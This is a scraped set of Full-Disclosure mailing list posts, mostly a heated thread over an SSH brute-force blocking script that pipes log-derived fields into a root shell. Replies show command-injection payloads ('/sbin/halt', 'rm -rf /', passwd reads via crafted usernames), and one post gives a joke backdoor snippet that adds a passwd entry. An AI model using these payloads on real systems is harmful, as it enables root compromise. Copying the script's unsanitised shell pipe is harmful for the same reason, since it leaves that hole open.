Dr. Neal Krawetz, PhD wrote: * PGP Signed by an unknown key However and the thing that really got my attention was the age range. They say “ages 3 and older”. What kind of 3-year-old is surfing the web and using IM, and sending email? Between 3 and 5 years old and most children are just starting to learn the alphabet. The average 5-year-old should be able to read simple words. Granted, there are some online games for tots and is that really the same as using the Internet? (Use a VCR or DVD player? Sure and I've seen 2-year-olds do that… But a tot surfing the web? Really?) Why can't you picture a 3 year old using the Internet. There are a lot of resources available for kids. A computer can be setup with bookmarks for tots, e.g. Cartoon Network, Sesame Street, etc., All of this makes me wonder… How soon before the RIAA begins suing 3-year-olds for illegal downloads? I mean and they have already gone after a 7-year-old. (And the 7-year-old was female. Coincidence? I think not!) Also, with this many young females online, I might need to trade my significant other M. in for a more attractive model. ;-) One could infer you mean a child from your comment. I might need to trade my significant other... for a more attractive model... You mention this in the same paragraph as you mention childern. EHAP WATCH OUT! For what -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Let's Winnuke Google!
[EMAIL PROTECTED] wrote: information that can be derived from an IP address.) I doubt that Google is a private company that generates revenue off of their targeted advertising expertise, and there is absolutely no legitimate value in this information to anyone. While it is acceptable to ignorantly profile based on ethnicity and nationality, it is not acceptable to analyze marketing statistics based on geographic location. No good can come from this! Yawn, yawn and more yawn. Google is a publicly traded company. Your comments about targeted advertising based on geographic locations are wrong. If you own a ski supply company, what purpose would it serve to have ads dished out to people in I don't know say Las Vegas or Miami. As for the rest of this rambling... Old and inaccurate news. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Stereotyping DoS and Don'ts
[EMAIL PROTECTED] wrote: I infer you're under the impression that this may some form of de-facto profiling of DoS kiddiots. But ask yourself, how hard would it be to take any of the given information you disclosed for an attacker in say America to be punctual in his attacks so that they may now mimic your mentioned Western European or Chinese attackers. * The USA and Canada are stereotypical in that they are not extreme in any single dimension. An attack may not start precisely at 1:00, but it will be around 1:00, it may not be homogeneous, but it will be close. And it may change as needed rather then exhaust one attack method. Americans are also more solitary. You won't see a hundred American hackers working in unison on the same target as you would in China or Brazil. Assumptions. Back in the mid to late 90's American script kiddiot groups were known for throwing their tags all over webpages. Groups ranged in size and judging by some of the IRC channels and forums of those times, some of these channels and groups were rather large. If you take a look at say Electronic Disturbance Theater, the numbers could have exceeded your best guesses, they were coordinated on a worldwide scale and they were on time. Regardless of the fact that they may have been American or Chinese. * The recent DoS against the root level DNS servers started exactly on the hour. At intervals of 1 hour, there were changes to the attack method. Both the Western Europe and China match this kind of attack: precisely timed, planned, homogeneous, and exhaustive. It's nice to assume but I could spend a day poking holes in your theory. * Similar to Blue Frog, the Smurf attacks from Mafiaboy were not precisely timed, but were exhaustive, showed short-term planning, and were independent attacks. Mafiaboy was Canadian. What you think you may know based on media accounts just might be wrong. For those on the greyhat scene in tune to what was going down at the time, most will know mafiaboy wasn't the sole culprit albeit he took the brunt of it all. I won't get into more than that. Stereotyping and profiling is commonly criticized for its inaccuracy. Assumptions should be criticized for providing vague information however, its a nice idea but filled with too many holes. While your idea sounds interesting, you're missing many of the essential FACTS to quantify the whole case on building Who is DoS'ing Your Servers movement. So to help you a bit more... Here are some profiles to add: Swedish attackers: They will ponder if they want to actually partake in the DoS. They'll sit back and think whether it is a fair war to get into, or whether they should sit back and let others attack as to not involve themselves in that war. Spaniards: They'll plan to attack at 1PM their time but the attack won't begin until 4PM as an attack will end up interfering with their siesta. A Spaniard will never attack during siesta time. Irish attackers. Although they'll meticulously plan the attack, due to the fact they sidestepped into a pub, by the time the attack is set to start, they'll likely be too drunk to initiate it. Nigerian attackers. They'll plan out a massive DoS attack but sidestep it in order to offer their victims a wire transfer of $10,000,000,000.00 from their deceased uncle Jimbobzinunu. On a serious note, I find it a bit strange that many who haven't been on the scene for quite some time point out modified histories of what occurred. Perhaps its time for a tell all book to be written about the so called hacker/cracker scene from the mid nineties through now. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Stereotyping DoS and Don'ts
[EMAIL PROTECTED] wrote: History is always written by the winning side. I couldn't agree more On the flip side, is there actually *any* one person who's in a position to give the real scoop on how things looked from the hacker/cracker side of the fence for that decade? I think there are about two handfuls that I know of that can place it all together but I also know in doing so many careers could be ruined as well as current businesses to some degree. I can think of a bunch of people who could talk about their corner of the scene, but by 1990 it was big enough that no one person could know all of it other than by hearsay Of the people I had in mind, it definitely would not be hearsay. When I describe the 90's I'm talking about the mid through late 90's and I mean this in the sense of those who were making noise on the scene with their attacks - keep in mind the original post was about script kiddiots (DoS) so I believe on that portion of individuals who were out attacking sites, defacing, etc., it would be easier than you think to put the puzzle together name names and give accounts of what truly happened. Would be an interesting read, but the author would also face the wraith of feds because they could possibly expose snitches, informants, rats however you want to call them. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco IP Phone vulnerability
-BEGIN LSD SIGNED MESSAGE- Infiltrated.net Security Advisory: Cisco IP Phone Denial of Service http://www.infiltrated.net/ciscoIPPhone7960.html Revision 6.9 For Public Release Summary The Cisco IP Phones are subject to a denial of service. This vulnerability has not yet been documented by Cisco but it should be allocated the bug ID 31337 by staff @ PSIRT This advisory will be posted at http://www.infiltrated.net/ciscoIPPhone7960.html Affected Products All Cisco IP Phones Proof of Concept http://infiltrated.net/7960poc.jpg Cisco Security Procedures Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html All Cisco security advisories are available at http://www.cisco.com/go/psirt. Details Cisco IP Phones are subject to a denial of service. Users who disconnect their ethernet cables will lose their dial tones and their present call will drop as well as subsequent incoming calls. While the attack may be local at present time, security engineers Infiltrated Networks (a division of Fscker Inc. with no relation to Halliburton) are devising telekinetic attacks along with Miss Cleo in order to provide a working disconnection attack tool. Impact All your phone sex belongs to null 0 Software Versions and Fixes The only fix is to plug your phone back into a PoE switch or plug in its power cord. Obtaining Fixed Software Infiltrated Networks and Fscker Inc. is offering its services at the low price of $1000.00 an hour in consulting fees to remedy this attack, with a 100 hour minimum retainer fee. In fact, for those seeking to purchase a PoC code of the mentioned vulnerability, contact us, we'll gladly take your milk money. Workarounds Don't unplug your phone. Don't unplug your PoE switches. Don't live in areas where electricity is sporadic. Don't play with matches, and don't drive while under the influence of anything that is currently mentioned at http://www.bumwine.com Exploitation and Public Announcements Infiltrated.net is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was reported to us losers, by another bigger loser who wishes to retain his or her anonyminity out of fear of obtaining Michael Lynn Disease where a frivolous denial of service attack via litigation will ensue and weaken the immune system. Status of This Notice: FINAL This is a final Infiltrated.net advisory. Although we cannot guarantee the accuracy of all statements in this notice, we still passed it on to you the consumer knowing full well a cease and desist letter will be sent and added to our collection. All of the facts have however been checked to the best of our ability while not under the influence of Prozac, Valtrex, Valium, Lithium and lest we forget, weapons of mass destruction of which you will not find since we have them buried in the secret stash boxes of our Nissan, Lexus, WRX, and Cherokee alongside our Glocks. Revision History Revision 6.9Initial public release This notice is Copyright 2007 by Infiltrated.net. This notice may be redistributed freely after the release date given at the top of the text, provided that redistributed copies are complete and unmodified, and include all date and version information. Pictures of your fiance, wife, girlfriend can be e-mailed to us if said individuals did not yet e-mail to us on their own. Infiltrated Networks, sil, and our oddball affiliates remind those on the security scene to keep it real. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Thierry Zoller wrote:
Dear All,
You are arguing over hypothesises where facts could rule. PLEASE someone
just setup the script on a test environment and present us your
results. Heck, it's not that we are discussing Metaproblems here,
these are computers.
Just install and make a PoC and enhance security for all
for the sake of it. Thanks :)
The problem with the whole thread was well someone could do XXX Sure
they could... Anyone could... My point was someone shooting a message
back to the list stating Your program is a backdoor. It never was and
it never will be. Can someone modify it on their own and make it a
backdoor? Sure. Can someone inject something into the columns I was
parsing, possible. Anything is possible. Since then I re-wrote arguments
people were griping about:
ifaddr=`ifconfig -a|awk '/inet/ !/inet6/ !/127.0/
!/192.168/{print $2}'|sed 's/addr\://g'`
function IPT {
grep -E
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}'
/etc/hosts.deny|\
awk '!/#//\./!a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}'|\
awk '/iptables/!/#/!/-s -i/'|sh
}
The complaint was anyone can insert $foo into the thirteenth column...
Try it instead of mouthing off about it. Someone can possible inject
tartar sauce into a sealed jar Is it possible, sure it probably is,
show me though instead of yapping off. Someone else griped, someone can
craftily insert your own address into an IP table. Look if someone is
THAT stupid of an admin to not test things first, modify it to their
needs, and gets themselves locked out of their own machine, they have no
business on that machine. Period.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
However, it is certainly possible. Here is an example.
#!/bin/sh
command='$(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd)'
ssh -o BatchMode yes a a $command@$1
Which produces log entries like this:
Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd)
Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a
$(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd) from
127.0.0.1 port 47403 ssh2
Note that the 13th field both contains a dot and is entirely controlled
by me. This string is placed in /etc/hosts.deny by the script after
executed by cron.
The $1 in the awk script below is the entire string, which is piped
unsanitised into /bin/sh:
awk '!/#/ /\./ !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}' /etc/hosts.deny |\
awk '/iptables/ !/#/ !/-s -i/'|sh
The results are obvious.
Incorrect did you look at the fix? It isn't unsanitized as you state:
Firstly data being passed is not coming through via /var/log/secure or
/var/log/auth* its coming in via /etc/hosts.deny
function IPT {
grep -E
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}'
/etc/hosts.deny|\
sed 's/::://g'|\
awk '!/#//\./!a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d 208.51.101.194 -p TCP
--dport 22 -j REJECT}'|\
awk '/iptables/!/#/!/-s -i/'|sh
}
[EMAIL PROTECTED] ~]# cat testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44
2383274298734
sakjdhasiuwe
hacker
aaa
bbb
ccc
0wn3d
[EMAIL PROTECTED] ~]# grep -E
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}'
testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44
So the buck stops there before it is put into the shell.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote: On Tue, Nov 28, 2006 at 10:56:33AM -0500, J. Oquendo wrote: Incorrect did you look at the fix? It isn't unsanitized as you state: J, you have made an attempt to fix it, but is is not sufficient. An attacker can still add arbitrary hosts to the deny list. Thanks, Tavis. Right... And as I stated on a different post... If an inexperienced admin allows that, it is on them. My attempt at making what I NEEDED and thought was helpful succeeded. If someone wants to nc insert arbitrary addresses, so be it. No different that someone spoofing random addresses at a firewall. What are you going to do, sift through every single address touching your network. Heck for what you just claimed An attacker can still add arbitrary hosts to the deny list. ... it is not sufficient ... TCP/IP is not sufficient with all of its issues. Give me a break -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote:
I notice you also havnt solved the local privilege escalation, this can
be abused by local users to gain root by attempting to login with the
username set to a valid passwd entry and then winning the race condition
by creating a symlink to the system passwd file (of course, there are
dozens of other attacks).
Thanks, Tavis.
And just what on God's earth does SOMEONE LOGGING IN WITH USERNAME SET
TO A VALID PASSWORD ENTRY have to do with this script. Let me take my
script out of the equation for a minute. SOMEONE LOGS IN WITH A
USERNAME SET TO A VALID PASSWORD ENTRY don't you think this is a
problem with the system they're on? Please explain to me how because I'm
seriously curious to know how you envision this happening with this
script of mine.
Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
awk '($5==Illegal||$6==Illegal)$9==from{print $10}'
Would stop the insertion attack and only print out the tench field if
fields 5, 6 and 9 match Illegal user from.
So that would pretty much minimize the attack on name insertion. If I
wanted to I could also make sure that if someone came after field 10,
then ignore the entire line:
Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
But before you shoot back let me send your response for you:
Tavis Ormandy will write:
Someone could log in using: Illegal User foo from
$OWNIPADDRESS@host which would make an entry:
Nov 27 16:31:21 local sshd[67010]: Illegal user dd from Illegal User
foo from $OWNIPADDRESS 213.134.128.227
SO let me restate. I could modify it to look at lines 5, 6, and 9 ...
Take a look at the tenth column and if anything comes after
that...Ignore that entire line... Should I have done so, maybe... Will I
do so... Maybe...
But wait there's more... Before you respond back Tavis, I will do so for
you:
Tavis Ormandy will write:
Someone could cause a race condition in awk that will allow peanut
butter to seep into my colo
Sorry can't help you there.
As to a fix to someone injecting ranDumb addresses. That same awk
statement above will work but if they're doing some netcat voodoo, then
feel free to shoot off another email on how my script broke TCP/IP entirely.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Anders B Jansson wrote: Just one possibly silly question. Why are you working so hard to do this with complex scripts and stuff? I just wrote a little C snippet that runs on the firewall. All servers allowing external ssh send a copy of ssh auth to a port on the firewall. If it detects a brute force it adds the host to the block list and everything from that host is silently dropped. Added a whitelist function to avoid DOS attempts. Works perfect, and adds community service by letting the trawlers hang until they timeout. The purpose of this wasn't to reinvent the wheel. It was to allow those using the tool to report the addresses of anyone brute forcing ssh. These addresses are going to be posted for others to see. Something like an RBL for brute forcers. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SSH brute force blocking tool
For those interested, I wrote a program called Sharpener which is an SSH brute force blocking tool that also reports back the offenders' addresses. I have begun posting the information on the attackers as well as sending out messages (whenever possible) to the admins of these domains. Think of it as an RBL for SSH attackers. The goal is to identify these machines in order for others to implement safeguards (ACL's) against these hosts. Feel free to comment/complain. http://www.infiltrated.net/sharpener (tool) http://www.infiltrated.net/bruteforcers (offenders) -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home.
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
if [ `whoami` != root ]
then echo This script needs to run under the root user
exit
else
if [ -e /tmp/hosts.deny ]
then
rm /tmp/hosts.deny
fi
/
Check to see if the user is root. If not, tell the user Hey dumbass, you
need to be root, if the user is root, continue.
/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}'
/etc/hosts.deny
/
There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny
into /etc/hosts.deny
/
OS=$( uname|sed -n '1p')
/
This is a no brainer. No voodoo there.
# IPTables function...
ifaddr=`ifconfig -a|awk '/inet/ !/inet6/ !/127.0/
!/192.168/{print $2}'|sed 's/addr\://g'`
Do an ifconfig on the machine. Ignore the word inet, inet6, 127.0,
192.168, print
the second field, and replace the term addr: with nothing. No voodoo
here jackass.
/
function IPT {
awk '!/#/ /\./ !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}' /etc/hosts.deny |\
awk '/iptables/ !/#/ !/-s -i/'|sh
}
/
This is such a hacker thing coming now. You caught me.
Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk
hacking)
/
if [ $OS = Linux ]
then
IPT
fi
/
This is where I guess I hack the world. Check the OS and if it's Linux,
then
cat /etc/hosts.deny
Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk
hacking)
then print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport
22 -j REJECT
$1 = IP address
$ifaddr = IP address of the interface
/
echo Copying sharpener to /usr/local/bin
sed -n '1,67p' ./sharpener /usr/local/bin/sharpener
echo fi /usr/local/bin/sharpener
rm ./sharpener
/
Here goes the voodoo... You ready?
print lines from 1 through 67 of this same file but put it in
/usr/local/sharpener
add a fi to that same file then remove the original
/
sleep 2
echo
echo Adding Sharpener to cron
echo 0,10,20,30,40,50 * * * * /usr/local/bin/sharpener
if [ -e /var/spool/cron/root ]
then
echo 0,10,20,30,40,50 * * * *
/usr/local/bin/sharpener /var/spool/cron/root
else
if [ -e /var/cron/tabs/root ]
then
echo 0,10,20,30,40,50 * * * * /usr/local/bin/sharpener
/var/cron/tabs/root
fi
fi
/
Add it to cron
/
awk '!/192.168/
!/127./
!/#/
!/172.32/{print $1 has been blocked via SSH}' /etc/hosts.deny |\
mail -s Sharpener [EMAIL PROTECTED]
fi
/
Print out the first column of /etc/hosts.deny ... Ignore 127., ignore #,
and ignore 172.32
then mail it to an evil hacker site so they can traverse telekinetically
into your machine.
Right.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home.
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.
$ ssh error retrieving@localhost ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`
Oops.
Thanks, Tavis.
So again dumbass...
Look at the script. Although YOU'RE opening /var/log/authlog what is the
script opening. Please tell me you're really not that stupid. And if
someone else decided to modify this script, what does that have to do
with what I posted. How exactly is my script a backdoor as you claim.
Enquiring minds want to know this since you claim its a backdoor. Please
tell me outside of your modification how this is going to backdoor someone.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
Uh... actually, no. The provided exploit Will work, and you're the
idiot.
Here, let me show you.
You do this:
/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}'
/etc/hosts.deny
/
There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny
into /etc/hosts.deny
What will be in column 13 when Tavis does this:
Tavis Ormandy wrote:
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Why, the shelled-out output of `/sbin/halt`!
Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.
Kids, don't use this script. Please.
Jesus christ people get stupider by the moment. W/e the script is there
for scrutiny there is no hidden voodoo. If you DO want to see hidden
voodoo here it is,,,
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
Uh... actually, no. The provided exploit Will work, and you're the
idiot.
Here, let me show you.
You do this:
/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}'
/etc/hosts.deny
/
There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny
into /etc/hosts.deny
What will be in column 13 when Tavis does this:
Tavis Ormandy wrote:
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Why, the shelled-out output of `/sbin/halt`!
Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.
Kids, don't use this script. Please.
Here is your voodoo backdoor moron
file=`awk 'NR==59 {gsub(//,);print $3}' /usr/include/paths.h`
sed -n '1p' $file|awk -F :
'BEGIN{OFS=:}{$1=test}1{$2=\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1}2'
$file
file2=`awk 'NR==74 {gsub(/,/,);print $8}' /usr/include/sysexits.h`
sed -n '1p' $file2|sed 's/[^:]*:/test:/' $file2
who=`sed -n '58p' sysexits.h |awk '{print $5}'`
what=`sed -n '60p' wireless.h |awk 'gsub(/,/, ){print $4}'`
when=` sed -n '60p' wireless.h |awk 'gsub(/,/, //){print $4}'`
$what|$who full-disclosure@lists.grok.org.uk
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
I'm not sure what you mean by modification, I simply subsituted the name
for the logfile I use.
Thanks, Tavis.
So for the third time now. Explain to me how I am backdooring someone's
system.
[EMAIL PROTECTED] include]# uname -a
Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686
i686 i386 GNU/Linux
[EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}'
/var/log/secure|sort -ru
222.171.20.252
211.137.74.58
My logs parse out addresses not named and there is no redirection going
on. If you want to say Hey... It should be written as such then gladly
do so. But posting hey you're backdooring the planet like a jackass is
moronic. Line by line on my machines it does what it needs to do and it
does so just fine. Did you see any notes of Gentoo on the comments? I
didn't because I don't use it, never have, don't care to. So if it does
something different on Gentoo, let's use the brain for a moment... Gee
this works horrible on Gentoo. The author is a shitty writer... I think
I should let him know as opposed to Oh my gawd he's backdooring you.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:
Mea culpa. Tavis's exploit doesn't so scary things, although he's
right you should really be doing a bit more sanitization of (evil)
user-supplied input, given that you're (insisting that you) run as
root.
Gabriel, I was referring to this line:
awk '!/#/ /\./ !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}' /etc/hosts.deny |\
awk '/iptables/ !/#/ !/-s -i/'|sh
(note the |sh), $1 can be controlled by specially crafted attempted
logins.
Thanks, Tavis.
That specially crafted attempt would be a HUGE raping of TCP/IP. How do
you supposed it would be possible for someone to insert 0wn3ed or any
other variable outside of an IP address?
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote:
You are dealing with output you can't trust there. $13 could be
anything, including \n`rm -rf /`. Later on, you pass $13,
unstripped of newlines, backticks, or any number of other special
character to a shell running as uid 0. That shell will proceed to
execute whatever we would like it to, where we are the remote
attacker who doesn't even have an account.
No it can't. Even if it was rm -rf someone placed in, did you not notice
my grep statement? Only print items with a decimal. At no given point
anywhere on the 13th column whether its Solaris, NetBSD, FreeBSD, would
there be an option for someone to craft anything...
FreeBSD
-bash2-2.05b$ uname -a
